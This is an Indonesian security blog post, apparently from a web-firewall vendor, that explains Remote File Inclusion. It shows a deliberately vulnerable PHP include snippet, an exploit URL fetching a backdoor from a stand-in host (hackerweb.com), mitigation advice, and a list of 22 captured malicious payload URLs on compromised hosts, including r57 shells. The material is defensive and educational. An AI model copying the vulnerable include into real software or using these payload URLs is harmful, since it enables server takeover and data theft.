Pengertian Serangan Remote File Inclusion (RFI) dan Daftar Malicious Website RFI Periode Januari-Juni 2017

Tl;dr : Ethic Ninja merilis daftar website* yang digunakan oleh hacker untuk membantu melakukan serangan RFI (Remote File Inclusion), data ini diperoleh dari log serangan yang ditangkap oleh Barikode WAF.

 

Apa itu RFI?

Remote File Incusion (RFI) adalah serangan yang ditujukan kepada website yang memiliki celah keamanan yang biasanya menggunakan fungsi memanggil file melalui suatu inputan dinamis, dalam hal ini berarti seseorang dapat mengganti alamat file yang akan dipanggil dan kemudian diproses. Tujuan hacker melakukan serangan ini adalah menyisipkan script berbahaya dari domain luar biasanya berupa backdoor/shell ke dalam server target.

Akibat dari serangan ini adalah hacker dapat mengambil alih server, pencurian data/informasi, memodifikasi konten (deface).

Gambaran alur RFI adalah sebagai berikut :

Contoh teknis serangan RFI

Ini adalah contoh pemrograman yang menyebabkan RFI dapat dieksploitasi oleh hacker. Misal programmer membuat fungsi include file yang tujuannya untuk memanggil file untuk di-include kan secara dinamis.

$page = $_GET[‘page’];
include($page);

Baris pertama script tersebut berfungsi memanggil inputan nama filenya, kemudian baris kedua berfungsi menyisipkan file tersebut.

Misal penggunaan kode tersebut untuk memanggil halaman kontak melalui URL :

http://localhost/index.php?page=kontak.php

Maka hacker akan melakukan expoitasi RFI dengan memanggil backdoor yang telah ditanam sebelumnya di suatu host. Sehingga URL dimanipulasi seperti berikut :

http://localhost/index.php?page=http://hackerweb.com/backdoor.txt

Dan dapat dilihat sekarang hacker dapat menguasai server. Game Over.

 

Pencegahan dan Mitigasi RFI

Cara terbaik untuk melakukan pencegahan serangan RFI adalah dengan cara melakukan sanitasi inputan dari user, inputan dapat melalui banyak celah diantaranya :

  1. Parameter Request seperti POST/GET
  2. Cookie
  3. HTTP Header

Dalam melakukan sanitasi/filter inputan sebaiknya menggunakan cara kerja whitelist yaitu mendaftarkan karakter apa saja yang diperbolehkan. Dibanding dengan metode blacklist, hacker dapat keluar dari blacklist dengan banyak cara, salah satunya dengan cara encoding. Dan juga perlu diperhatikan proses sanitasi harus dilakukan di sisi server bukan di sisi klien. Jika anda tidak terlalu paham untuk sanitasi ini, Barikode WAF telah dilengkapi dengan modul anti RFI sehingga tidak perlu repot lagi melakukan perbaikan kode pada existing system.

 

Data Serangan RFI

Berikut data yang berhasil diperoleh dari periode Januari 2017 hingga pertengahan Juni 2017 :

  1. ftp://sibay:[red]@sibay.su/core/js/2017.php?
  2. ftp://berksent:[red]@www.berksent.com/home/hd.ccuniversal.com/html/mysting/files/location_5061/Music/config.php?
  3. http://www.uroda-chrzanowska.pl/r57.txt?
  4. ftp://manentti:[red]@www.manentti.com.br/envi.php?
  5. ftp://upveiculos:[red]@www.upveiculos.net/envi.php?
  6. http://www.uroda-chrzanowska.pl/r57.txt?
  7. ftp://daithanh:[red]@daithanhtech.com.vn/envi.php?
  8. ftp://coastaltag:[red]@coastaltag.com/1.php?
  9. ftp://genesys:[red]@genesys.cl/envi.php?
  10. ftp://delfin:[red]@delfin.brontosaurus.cz/2015-07-25-Ohre/bbbbbbb.php?
  11. ftp://alsancak:[red]@alsancaktarim.com/config/minhacmd.php?
  12. ftp://rumblytums:[red]@www.rumblytums.co.nz/envi.php?
  13. ftp://alsancak:[red]@alsancaktarim.com/.php/1.php?
  14. ftp://segurhotel:[red]@segurhotel.com.br/public_html/media/minhacmd00001.php?
  15. ftp://infinito:[red]@www.infinito.it/envi.php?
  16. ftp://cdfeorellana:[red]@cdfeorellana.com/logs/s.php?
  17. http://angelhelper.co.kr/r57.txt?
  18. ftp://kantorrico:[red]@www.kantorrico.pl/envi.php?
  19. ftp://abeshokai:[red]@abeshokai.jp/new1/imo30.php?
  20. ftp://maragusa:[red]@www.maragusa.com.br/Thumbr.php
  21. ftp://delrue@delrue.be/css/Thumbr.php?
  22. ftp://webmaster:[red]@www.mvlivemusic.com/abc.php

Comments 1

Leave a Reply

Your email address will not be published. Required fields are marked *